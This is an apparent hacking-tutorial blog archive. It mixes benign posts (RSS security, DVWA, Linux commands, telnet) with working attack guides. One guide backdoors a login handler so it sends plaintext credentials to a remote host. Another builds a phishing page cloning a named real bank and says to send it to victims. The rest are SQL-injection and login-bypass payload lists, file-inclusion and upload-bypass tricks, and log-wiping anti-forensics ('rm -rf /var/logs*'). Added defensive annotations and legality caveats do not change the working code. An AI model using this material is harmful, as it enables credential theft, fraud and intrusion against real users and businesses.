Many times business owners like to include comments from subscribers in the RSS contents, and mostly they hardly look at the actual content of those comments. There is always a possibility of malicious scripts being injected in those comments as well. So proper filtering and sanitising has to be employed before storing new content in your RSS feeds, rather than just storing the comments as-is. Stripping a blacklist of tags such as script, embed and object is not enough on its own — script can also ride in event-handler attributes (onload, onerror, onclick) and in javascript: URLs in href/src — so use an allowlist-based HTML sanitiser, or escape the comment text entirely if it does not need to contain HTML at all. Also, using a safe and secure RSS reader or aggregator is a good approach to RSS security. So you should choose the most secure RSS reader or aggregator from the available ones and suggest those to your subscribers. Also, make sure that your customers and employees use the latest and patched version of the reader so that the maximum level of security is ensured.

In many cases, the RSS generators and other services in the RSS servers are also prone to security attacks and the attackers might be able to gain certain level of privilege in the system. In such case, the attackers can replace the original RSS feeds with their own affected version of RSS feeds which will then be delivered to your customers affecting your customers and your business as well. This can be devastating as this might lead not only to the script injections in the feeds but also stealing of many sensitive information from the server. For example, if your RSS server is used to host your business website or maybe for file sharing, the critical data related to them might be compromised as well. So proper security assessment of the server and network from the security professionals is necessary before taking your system live for production usage.

As a business owner, you must understand that security is a necessity in any system, be it a physical system or be it a digitized and online system and RSS is not an exception to this. If you want to succeed as a business owner, you should never underestimate the need of security and privacy and you should employ proper level of security as discussed above in the RSS system. Security in RSS system will ensure gaining of customers and expansion and promotion of your business so do not miss security practices in your RSS feed contents.




Thursday, 21 April 2011

Practise, Learn and Master Web Application Hacking With DVWA

DVWA, which stands for Damn Vulnerable Web Application, is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.


The DVWA v. 1.07 can be downloaded from HERE.

You will need to install an Apache+PHP+MySQL environment (use the LAMPP or XAMPP packages) to run and test this web application. Because DVWA is intentionally exploitable — up to and including command execution on the host — run it only inside an isolated VM or bound to a loopback/host-only interface, never exposed on a shared or public network. This will definitely help you learn to spot web vulnerabilities of varied levels. I hope this was useful. :)


Thursday, 7 April 2011

How to steal password from login form

This article was written by neutralised of thesoftwareengineer.org, but that domain has already expired, so I am putting the article here so that this small piece of information for beginner web hackers won't die. Note that the technique assumes the attacker already has write access to the application's source on the server — it is a post-compromise credential-harvesting step — and using it against a system you are not authorised to test is a criminal offence. From the defender's side, file-integrity monitoring on the web root and alerting on unexpected outbound HTTP requests from the application server are the controls that catch exactly this kind of modification.

-------------------------------------------------
[+] Login Form Password Stealing - Tutorial
[+] Author: Neutralise
[+] Location: http://thesoftwareengineer.org/services/tuts/LoginFormPassStealing.txt
--------------------------------------------------

Intro:
It seems that alot of people these days are gaining shell access, downloading a database then attempting to crack the hashes. If they are salted, sha1 or a hard to crack plain ole' MD5, they start bitchin and moaning when they can't get the plain text. So here it is, a tutorial on how to get user:pass format in plain text of ANY hash type.

Method:
Modify the login handler of a site so that it captures the password remotely before the application hashes it (the original says "encrypted", but password storage uses one-way hashes — which is exactly why offline cracking fails on strong or salted ones). I will explain this more simply via an example.
Take the following login form for example,

<!-- Target login form from the original post: the credentials are POSTed to cookies.php, which is the file the tutorial goes on to modify. -->
<form method="post" action="cookies.php">
<hr />
<p>
User: <input type="text" class="buttonstyle" name="username"></p>
<p>
Pass: <input type="password" class="buttonstyle" name="password"></p>
<p>
<input type="submit" value="Login" class="buttonstyle" name="submit"> 

<input type="reset" value="Reset" class="buttonstyle" /></p>
</form>

Now we can see that the action of this form points to 'cookies.php'. cookies.php will probably include code similar to this, depending on the hashing scheme used, etc.

<?php
// Illustrative login handler from the original post. $usermd5, $passmd5 and
// $cookie are assumed to be defined elsewhere (e.g. loaded from the database).
$user = $_POST['username'];
$pass = $_POST['password'];
// NOTE(review): loose comparison (==) on hash strings is a known PHP pitfall —
// two numeric-looking strings such as "0e..." compare equal numerically, so use
// === (or hash_equals()). Hashing here also offers no protection against an
// attacker who can already edit this file, which is the premise of the tutorial.
if(md5($user) == $usermd5 && md5($pass) == $passmd5){
setcookie("Whatever", $cookie, time()+3600, "/");
header("Location: index.php");
die();
}
?>

Now, to bypass the hashing before it happens and thus obtain the username and password in plain text, we need to edit the 'cookies.php' file and add the following code at the start of the php tags.

<?php
// Credential-exfiltration stub reproduced from the original post for awareness
// only — deploying this on a system you do not own is unlawful. It runs before
// the real handler, so the plaintext credentials leave the server on every login.
$user = $_POST['username'];
$pass = $_POST['password'];
// Defender's note: the credentials travel in a GET query string over plain HTTP,
// so they also land in any proxy and web-server access logs along the way; an
// unexpected outbound HTTP request from a login handler is a strong detection signal.
file_get_contents("http://site.com/plain.php?user=".$user."&pass=".$pass."");
?>>

Now the php file 'plain.php' will include the following code:

<?php
// Receiving side of the exfiltration (awareness only). It appends one
// "user:pass" line per request to a plain-text file; placed under the web root
// and made world-writable as the post suggests, that file is typically readable
// by anyone who can reach the host.
$user = $_GET['user'];
$pass = $_GET['pass'];
$file = "lol.txt";
$fp = fopen($file, "a");
fputs($fp, "$user:$pass\n");
fclose($fp);
?>>

Notice you will also need to upload a file 'lol.txt', and chmod it to 777.

Conclusion:
Now every time a user logs into the site whose code you have edited, it will send the username and password to 'plain.php' on the remote server, which saves them in 'lol.txt' in the format:
user:pass

------------------------------
[+]^Neutralised.
------------------------------


Saturday, 19 February 2011

Art of hacking 2 - spyd3rm4n's guide to hacking

Earlier I posted the spyd3rm4n's guide to hacking part 1 over HERE. This is the 2nd part of the guide. Enjoy the guide.

Part II

[0x01] Common_Knowledge
[0x02] How


Sub Common_Knowledge{
It is customary that a hacker know how to hack, but it is mandatory that a hacker know how to hide his/her ass.

You DO NOT want to get caught because:
A) I'm sure you don't want to pay that hefty fine.
B) I'm positive you don't want a criminal record.
C) You probably don't want to be put on probation.
D) You put everybody you have contacted on the internet within your past at risk of being caught.
E) You WILL be frowned upon as a terrible hacker. Everyone knows, you're dumb as shit if you get caught.
F) If you find any reasons why getting caught would be a good idea, please consider the following:
Go to the local gunshop.
Purchase a powerful weapon (remember, you don't want to screw this up.)
Purchase a small magazine.
Go home, place the clip into the weapon, take off the saftey and look into the barrel of the gun and email me back
the color that flashes inside the barrel when the trigger is pulled.
}

Sub How{
What are some ways you can hide your ass? Well, good question, but there are many answers.

I have to say, that the most common way for a person to hide their e-dentity is via a proxy.
Now, one problem with the proxies, is that anyone with common sense can find out your real IP. This is the start of Forensics.
The easiest way for a person to find your IP is the find the provider of the proxy, most like CDN (CoDeeN), seeing that they are
the largest proxy releasing company on the inet. Once they contact CoDeeN (who keep records of all IP's logged into their proxy
at all times), they can find your IP and with a simple whois, can come up with the location of you or your ISP. After that, it's just
a long talk between you and your ISP to find out your information. That's if there has been illegal activity and/or you caused some 
pretty hefty damage. ISP's can't release a persons information without a court order as that is an invasion of privacy. But there are
some loop holes in this system. I'm sure you have all read your ISP's fine print and Terms of Service correct? Well, it will most likely
contain something stating that hacking is illegal and that if caught, they can and will report you to the authorities etc.
Another reason is the easy PHP lookup $_SERVER['HTTP_X_FORWARDED_FOR'], which exposes your original IP whenever a non-anonymous proxy adds that header, and can be used to block your attempt at viewing the site. The flip side for site owners: that header is set by whoever relays the request, so it is trivially spoofable and must never be trusted for access control or audit logging without knowing exactly which proxy inserted it.

Another way of hiding your ass, which I suggest as a first part, because it is the easiest, is find a VPN. VPN stands for Virtual Private
Network. Large companies/businesses have these VPN's for their employees to operate on a local network (LAN) over WAN (Wide
Area Network). They will mask your IP with the IP that the VPN is setup on. I.E. My IP is 66.77.88.102 and the VPN IP is 24.12.21.64,
when I log into the VPN, my IP will become 24.12.21.64. This covers your IP over every protocol, it whoops Socks 4 and Socks 5 proxies
rearends. The one thing you have to worry about with a VPN, is that they too, if setup correctly, can log every IP that has used the VPN
at anytime of the day.

Now that the 2 most common ways of hiding your ip have been discussed. Let's not rule out some of the other ways. One being VNC tunneling.
This is the process of logging in to a remote administrative tool repeatedly on other servers.
Example:
Server 1 IP: 1.2.3.4
Server 2 IP: 1.2.3.5
Server 3 IP: 1.2.3.6

All servers have VNC running. I will then log into the VNC for Server 1, then I will use Server 1's VNC to log into Server 2, and repeat the process until
I am logged in on Server 3. This will hide my IP 3 times and make tracing it back even harder. But, once again, you've guessed it. It records everything.

Well, Since I'm getting pretty desperate here, why don't I go balls out?

I will hop on a VPN, then I will VNC tunnel into about 2 or 3 Servers, while logging into a VPN on each of those, then, finally, when I'm tunneled into
Server 3, I will put a VPN on, log into a Socks 4 proxy, put on a anonymous proxy, if I have to, even goto a well known web proxifying site that runs
a CGI or PHP built proxy to view the content needed. Now, picture yourself as that person who has to find your real IP. Yeah, it's gonna be a blast.
The only bad part about this is the fact that the more you log into, the slower and slower it will get. Best done on a high-speed line.

Finally, since this is a mini-book on hiding your ass, I might as well tell you that everything of anything on the internet is logged. Don't forget to clear them. (Bear in mind that deleting logs is tampering with evidence — an additional offence in its own right — and that any host shipping its logs to a remote syslog server or SIEM, or running file-integrity monitoring, records both the activity and the deletion; logs that suddenly go missing are themselves an incident indicator.)
Example: SSH-
don't forget to rm -rf /var/logs*
}

- Credits : Kr3w of TheDefaced.


Friday, 18 February 2011

Art of hacking 1 - spyd3rm4n's guide to hacking

This series of articles can be very useful for many beginners out there, but after thedefaced and darkmindz went down I haven't really seen these articles anywhere else, so I thought I would share them here. They are NOT written by me and I would like to give full credit to the original author. As with everything in this series, the methods described are only lawful against systems you own or have explicit written permission to test.


Art of hacking [ 1 ] 

spyd3rm4n's guide to hacking

Part I

[0x01] Definition
[0x02] Method
[0x03] Side_Notes
[0x04] Credits

Sub Definition{
a : to write computer programs for enjoyment
b : to gain access to a computer illegally
}

Sub Method{
These are the boundaries that differentiate a hacker, from a cracker. A cracker will use the same methods of a hacker, but instead of leaving it at just that, they will take it one step beyond, and use the information gained to extort another person and/or cause damage.

Now that has been cleared up, I will just inform you of one of my most common method of hacking.

When I hack, it is a golden rule that I must know what I am hacking. If it's a website, I must know what language is it written in. If I do not, I will learn the language, or at least be able to read it and pick out human errors in the programming.

I usually start like this:
I will first search the website for vulnerable user-input fields. Something that interacts with the viewer. It should include fields that are POST and GET. I will test these fields for penetration. The most common fields vulnerable, are search forms. These can be vulnerable to almost any type of injection, HTML, JAVASCRIPT, or SQL. To test if a field is injectable with HTML, I will usually type "<h1>hello</h1>." If the page returns the word hello in big bold letters, I know it's vulnerable. I then will step it up to JAVASCRIPT. I will type "<script>alert(1)</script>", <script language="Javascript">alert(1)</script>m etc.." If the returned page contains an alert message printing the number 1, I know I can cross-site script it (XSS). SQL on the other hand has a number of pen-testing syntaxes. I usually type a single quote, if it returns SQL errors, I know its vulnerable to injection. If it doesn't, I will sometimes try different combinations of SQL attacks. I will try most commonly, and my favorite, a union injection. Syntax: '+union+select+1-- 
If that returns with any sort of SQL error, I then know I hit the jackpot. The most common error with union selections is "The UNION SELECT statement is missing the correct number of columns" or something of that sort. It means that you have to select more than one column. This can be the longest part of injecting. You then have to '+union+select+1,2-- each time, adding on another number separated by a comma until your UNION SELECT statement has no errors, and returns a value from that field. I will then look for the returned page for a number. If for example, lets say I did '+union+select+1,2,3,4,5,6--
and the page returns a series of pictures, and in the blue, there is just the number 6 on that page, I will then do '+union+select+1,2,3,4,5,table_name+from+information_schema.tables--
This will select the table name from the information schema, if its allowed. That's all I'm going to say about that for now. If you want to know more, you can learn up on your SQL.

Next, if I find the site is pretty secure, it is always important not to rule out other methods of intrusion. My 2nd and favorite method, is the capturing of the host. With a simple WHOIS lookup, I can find the host of their site. Now, if I pen-test their host and find a vulnerability, that is just as good as hacking their site because it allows for a way in. If all else fails, you can do a reverse IP lookup on the domain of the website. Take a look at all the other websites on that IP and pen-test their security. If you can get rights to upload on one of their sites, you can upload a PHP-Shell and work your way into their directory, viewing their files. If you want to take it further, you can go ahead and try to root the server. Rooting is pretty easy if you know what you're looking for/know any stack/buffer overflows for the OS. Most servers run linux, so it's best to look for overflows for that specific kernel version that contain "Local Root" in it. Other than that, there are so many ways of obtaining root. These include but are not limited to key-logging, phishing, and social engineering. That's pretty much the basis of one of my most common methods of hacking. If you would like to know more, well.. I'm sorry, but you're going to have to pick up the knowledge as you continue your career hacking.
}

Sub Side_Notes{
If you want to learn more, you can check out the mini-books on Hide My Ass, XSS Injection, SQL Injection, Navigating towards root in a PHP Shell, and Stack Overflows in a nuttshell.
}

Sub Credits{
I'm sure you're all wondering who I am going to credit in this. The thing is that over the years, I have encountered many talented hackers. Too many to name in fact. But, there is one person I have to give credit to for being probably one of the most talented hackers I have "read" from. This person is unknown, and I'm sure many of you have read some of their docs. This person is the author of the ZFO (Zero For Owned) series. If you haven't read them, I highly suggest you do a google dork for Zeroforowned. Not to sure on how many of them are still public/around. (You'll notice the style of documentation similarity that I have put in this document, with the ZFO).
}

- Credits : Kr3w of TheDefaced 



Sunday, 26 December 2010

Web Hacking for Beginners and Intermediates

This is the article I posted on the secworm contest and I am now posting this in my blog. Its not that well written due to the lack of time but still will help some of you out there.

Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.

This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.

SQL Injection:
Comments: -- (in MySQL the double dash must be followed by whitespace to count as a comment), /* */, #
MySQL version: SELECT @@version

Current SQL User: SELECT user()
SELECT system_user()

Current Database: SELECT database()

MySQL Data directory(location of MySQL data files): SELECT @@datadir

List all MySQL users: SELECT host, user, password FROM mysql.user

Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char

Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.

Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.

Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)

unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--

Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091

XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>

Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.

' /*or*/ 1='1 –Bypasses or filter


File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php (the snippet itself did not survive in this copy of the post; from the requests that follow, it is evidently a script that passes the page query parameter straight into a file inclusion without validation)


including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

Nullbyte injection (the %00 that terminated the path after the traversal has been stripped from this copy; it only works on PHP older than 5.3.4, which began rejecting NUL bytes in filesystem paths)
test.php?page=../../../../../etc/passwd

Directory listing with nullbyte injection, only for FreeBSD (afaik) and magic quotes off (again, the trailing %00 is missing here)
test.php?page=../../../../home/

PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also try including everything you can reach, such as session files, uploaded files, etc. For Apache log injection you send a request (e.g. via telnet) whose request line or User-Agent contains the PHP code, so that it gets written into the access log before you include it; the example request and the list of common Apache log locations from the original post did not survive in this copy.

Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.

Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.

File upload:
Double extension / nullbyte: If only certain extensions (such as jpg, gif) are allowed, the post suggests renaming the shell to shell.php.jpg. Strictly speaking that is a double-extension bypass — it only yields code execution where the web server is misconfigured to hand any path containing a .php segment to the PHP handler — whereas a null-byte bypass proper would truncate the stored filename right after .php, and PHP 5.3.4+ rejects null bytes in paths. On the defensive side, validate the final extension against an allowlist, give uploads server-generated names, and store them outside the web root.

PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.

Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.

Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.

As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.




Wednesday, 1 December 2010

Speeding up opening of Acrobat Reader

Whenever you launch acrobat reader, it takes some extra times while loading the plugins and we rarely use those plugins(In fact, I rarely use them) so we can speed up the opening of acrobat reader.

The trick in speeding up the process of opening acrobat reader is by removing the plugins from plugins folder and putting them in the folder called optional. First, go to the acrobat reader installation directory which will be probably located somewhere at

C:\program files\adobe\

There, you will see the folder called plugins. What you have to do is cut and paste all the items from plugins folder to optional folder. Make sure that you are not locking any of those files by opening the acrobat reader while doing cut/paste. Hope this helps you. :)


Tuesday, 23 November 2010

Some useful linux commands

This page lists some of the useful linux commands you might need to be using frequently. This is however not the complete list of the commands, rather I'd try to post more and more useful linux commands here.

gksudo command/program - run the visual sudo and start the specified command/program with elevated privilege.

sudo command - run the command with elevated privilege.

ps -A | grep -i your_program_name - ps gives the snapshot of the current running processes and this can be quite useful to view the running program's PID to use with kill command.

kill pid - this will kill the target program by using PID. you might need to use sudo version sometimes if the running program was not run by the current user.

ifconfig - display the network interface information. iwconfig is the similar tool for the wireless device.

ufw enable/disable - enable or disable the firewall.

uname -a - get every information about your linux kernel.

sudo dpkg --configure -a - configure and repair the broken package.

I'll be updating this list with any commands I happen to remember.


Sunday, 21 November 2010

Enabling telnet in windows 7

Yesterday, when I was in my Saturday class in Kathmandu, I needed to use telnet to find the SSH version of a server as part of a recon challenge for my friend (an SSH server announces its software version in the first banner line it sends). But I found that Windows 7 has no telnet client enabled by default. After returning to KU, I played around with my friend's laptop to find the way to enable the telnet client.

Just go to the control panel and choose the programs and features option.
There, you'll find the option Turn Windows features on or off.
Check the telnet client and hit Ok.
Now you can use the telnet client in your windows 7. Have fun.


Wednesday, 13 October 2010

Making a fake login page [tutorial on phishers for beginners]

This tutorial will give you a basic idea of what phishers are and how to create a simple phisher. It is shown so that you understand how the attack works: building such a page against a real institution and sending it to real users is fraud, and in an authorised red-team engagement it is done only with the target organisation's written consent and a defined scope. Please be sure to comment on this post.

A phisher is a fake login page used to gain access to someones account. When someone logs into
the fake login page, there password is sent to you in some way such as by email or by writing to the files in the webserver. The major attacks of the phishing are the email accounts and e-commerce sites so this method is widely used to steal the critical information from the users.

Now, I'll show you how to make a successful phisher by giving an example by creating the phishing page of e-Banking of Nepal Investment Bank Limited.
a) We open the login page of our target site and save the page in our HDD by going to File->Save As from Firefox.

b) You'll have a HTML page and the folder containing the required images, css and javascript files for the HTML page.

c) Create a file like passes.txt or whatever where you'll store all the passwords from the phishing page. Note that you'll have to chmod this file to writable(like chmod a+w filename or chmod 777 filename according to the permission you want).

d) Now create a PHP file called phisher.php and paste the code below:

<?php
// Phishing back-end reproduced from the original post for awareness: it dumps
// every submitted field to passes.txt and then bounces the victim to the genuine
// bank site so the failed login looks like an ordinary retry. Hosting this
// against a real institution without written authorisation is fraud.
header("location:https://www.nibl.com.np/BankAwayRetail/sgonHttpHandler.aspx?Action.RetUser.Init.001=Y&AppSignonBankId=004&AppType=retail");
$fp = fopen("passes.txt","a");

// $_REQUEST typically merges GET, POST and cookie data, so whatever the cloned
// form submits ends up in the file.
foreach ($_REQUEST as $var => $val)
{
    fwrite($fp, $var." = ".$val."\r\n");
}
fwrite($fp,"\r\n");
fclose($fp);
?>

e) Your phishing PHP script is ready. Now time for editing the HTML source of your target login page. Open the HTML source in text editor and search for the text <form in my case(&usually) and in the action field specify the name of your PHP script like:

<form action="phisher.php" method="POST" name="RetailSignOn">

f) Now, our phisher is ready and all you have to do is upload the phisher.php and the HTML source and its related folder to free webhosting (I use t35.com). Be sure to create passes.txt and set proper permission in the webserver.

g) Now, all you have to do is send the link of your phisher to the users by emailing, forum boards, XSS methods or by RTLO spoofing or any other method you can work creatively.

Now, if you want to stop these phishers, submit the phisher links you find on the internet to www.phishtank.com, and also report them to the impersonated organisation's abuse contact and to the hosting provider so the page gets taken down quickly.

I hope you learn something from this phishing tutorial. Have fun. :)
